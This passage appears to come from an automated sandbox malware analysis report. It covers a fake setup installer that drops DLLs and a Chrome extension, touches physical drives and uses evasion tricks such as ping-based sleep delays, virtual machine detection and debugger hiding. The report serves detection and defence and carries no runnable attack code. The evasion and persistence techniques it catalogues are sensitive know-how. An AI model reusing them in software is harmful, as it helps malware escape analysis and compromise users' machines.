Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI61C2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\icon.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\icon48.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\popup.htmlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\background.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\book.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\jquery-1.8.3.min.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\popup.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\manifest.jsonJump to behavior

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d4_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d4_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d4_2_1001D7E0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004560A0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_004560A0
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\1611946678493.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_100204C04_2_100204C0
Uses ping.exe to sleepShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,4_2_10019780
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_100204C04_2_100204C0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exe TID: 5276Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe TID: 5596Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe TID: 3544Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004C2B17 __getdrive,FindFirstFileA,_strlen,_IsRootUNCName,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,___dtoxmode,GetLastError,FindClose,1_2_004C2B17
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1001A170 FindFirstFileA,FindClose,4_2_1001A170
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0041E22C GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,1_2_0041E22C
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00412C23 GetCurrentProcess,GetModuleHandleW,GetModuleHandleW,GetProcAddress,_memset,GetVersionExW,GetModuleHandleW,GetProcAddress,GetSystemInfo,1_2_00412C23
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304732625.0000000003CE5000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: 6852B33702F6B3BD.exe, 00000004.00000003.259627838.0000000002241000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000003.262107276.00000000021E1000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 6852B33702F6B3BD.exe, 00000004.00000003.286862593.0000000003CC3000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter}
Source: ecvAA35.tmp.11.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150352Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9adc5de308f048a794c5e60e88191707&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=838177&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=838177&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 6852B33702F6B3BD.exe, 00000004.00000003.286872651.0000000003CA1000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305023752.0000000003CBF000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000003.262107276.00000000021E1000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261158287.000000000081C000.00000004.00000020.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289445112.0000000000865000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: 6852B33702F6B3BD.exe, 00000004.00000003.259727824.000000000226D000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289558161.000000000220D000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 6852B33702F6B3BD.exe, 00000004.00000003.287164919.0000000003CA7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}
Source: 6852B33702F6B3BD.exe, 00000005.00000002.288732757.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation CounterHB
Source: 6852B33702F6B3BD.exe, 00000005.00000002.288732757.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 6852B33702F6B3BD.exe, 00000004.00000003.287164919.0000000003CA7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 6852B33702F6B3BD.exe, 00000004.00000003.287599977.0000000003CAD000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}*
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305115180.0000000003D14000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPIxu
Source: C:\Users\user\AppData\Roaming\1611946678493.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,4_2_10019FF0
Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00490470 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00490470
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004560A0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_004560A0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00496048 mov eax, dword ptr fs:[00000030h]1_2_00496048
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00496075 mov eax, dword ptr fs:[00000030h]1_2_00496075
